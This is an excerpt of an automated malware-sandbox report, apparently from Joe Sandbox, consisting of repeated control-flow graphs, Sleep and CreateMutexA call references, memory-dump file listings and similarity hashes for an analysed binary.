                                                                                                                                                                                                                                                                control_flow_graph 275 85a079-85a099 279 85a0c7-85a0e3 275->279 280 85a09b-85a0a7 275->280 283 85a0e5-85a0f1 279->283 284 85a111-85a130 279->284 281 85a0bd-85a0c4 call 86d663 280->281 282 85a0a9-85a0b7 280->282 281->279 282->281 287 85a930 282->287 289 85a107-85a10e call 86d663 283->289 290 85a0f3-85a101 283->290 285 85a132-85a13e 284->285 286 85a15e-85a916 call 8680c0 284->286 292 85a154-85a15b call 86d663 285->292 293 85a140-85a14e 285->293 296 85a953-85a994 Sleep CreateMutexA 287->296 297 85a930 call 886c6a 287->297 289->284 290->287 290->289 292->286 293->287 293->292 304 85a9a7-85a9a8 296->304 305 85a996-85a998 296->305 297->296 305->304 307 85a99a-85a9a5 305->307 307->304
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0085A963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: da76a887135d3087f530284a0d250fbee88068277971fd45f3580af489e806cb
                                                                                                                                                                                                                                                                • Instruction ID: 24fca616f46e90e2fc2be764fa89c3de9a061fbb7b1c04a4fb5cc36d22935b4f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da76a887135d3087f530284a0d250fbee88068277971fd45f3580af489e806cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 873148317502049BEB0C9B78DCC9BADBB62FB91312F204319E825D73D1C77699888753

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 309 85a1ae-85a1ce 313 85a1d0-85a1dc 309->313 314 85a1fc-85a218 309->314 315 85a1f2-85a1f9 call 86d663 313->315 316 85a1de-85a1ec 313->316 317 85a246-85a265 314->317 318 85a21a-85a226 314->318 315->314 316->315 319 85a935 316->319 323 85a267-85a273 317->323 324 85a293-85a916 call 8680c0 317->324 321 85a23c-85a243 call 86d663 318->321 322 85a228-85a236 318->322 327 85a953-85a994 Sleep CreateMutexA 319->327 328 85a935 call 886c6a 319->328 321->317 322->319 322->321 330 85a275-85a283 323->330 331 85a289-85a290 call 86d663 323->331 338 85a9a7-85a9a8 327->338 339 85a996-85a998 327->339 328->327 330->319 330->331 331->324 339->338 341 85a99a-85a9a5 339->341 341->338
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0085A963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 06e8515bbbce8dd271f2304a89b0ecd0ee82575975d1f37ac34f33c598b467e9
                                                                                                                                                                                                                                                                • Instruction ID: a6c4b778055892b4b4496365312681c7a958de92ac1f615b7bbd2fd599663e8e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06e8515bbbce8dd271f2304a89b0ecd0ee82575975d1f37ac34f33c598b467e9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C312631B002449BFB0C9B7CDCC9BADBB62FB96312F244719E814E72D1D77699888752

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 343 85a418-85a438 347 85a466-85a482 343->347 348 85a43a-85a446 343->348 349 85a484-85a490 347->349 350 85a4b0-85a4cf 347->350 351 85a45c-85a463 call 86d663 348->351 352 85a448-85a456 348->352 355 85a4a6-85a4ad call 86d663 349->355 356 85a492-85a4a0 349->356 357 85a4d1-85a4dd 350->357 358 85a4fd-85a916 call 8680c0 350->358 351->347 352->351 353 85a93f-85a949 call 886c6a * 2 352->353 374 85a94e-85a994 call 886c6a Sleep CreateMutexA 353->374 375 85a949 call 886c6a 353->375 355->350 356->353 356->355 363 85a4f3-85a4fa call 86d663 357->363 364 85a4df-85a4ed 357->364 363->358 364->353 364->363 379 85a9a7-85a9a8 374->379 380 85a996-85a998 374->380 375->374 380->379 381 85a99a-85a9a5 380->381 381->379
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0085A963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 5691b5d508a0f62e716634893afb66674466b3d8a64952f89d1dd4dff4fc8933
                                                                                                                                                                                                                                                                • Instruction ID: c1ab48c45014f37f03df146f4ab3ae8ddc628e37879242382eae0086a9a7f1ab
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5691b5d508a0f62e716634893afb66674466b3d8a64952f89d1dd4dff4fc8933
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C311931B001049BEB0C9BBCD8CDBAEB762FB91315F244319E414D72D5D7B559848757

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 383 85a54d-85a56d 387 85a56f-85a57b 383->387 388 85a59b-85a5b7 383->388 391 85a591-85a598 call 86d663 387->391 392 85a57d-85a58b 387->392 389 85a5e5-85a604 388->389 390 85a5b9-85a5c5 388->390 395 85a606-85a612 389->395 396 85a632-85a916 call 8680c0 389->396 393 85a5c7-85a5d5 390->393 394 85a5db-85a5e2 call 86d663 390->394 391->388 392->391 397 85a944-85a949 call 886c6a 392->397 393->394 393->397 394->389 402 85a614-85a622 395->402 403 85a628-85a62f call 86d663 395->403 409 85a94e-85a994 call 886c6a Sleep CreateMutexA 397->409 410 85a949 call 886c6a 397->410 402->397 402->403 403->396 417 85a9a7-85a9a8 409->417 418 85a996-85a998 409->418 410->409 418->417 419 85a99a-85a9a5 418->419 419->417
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0085A963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
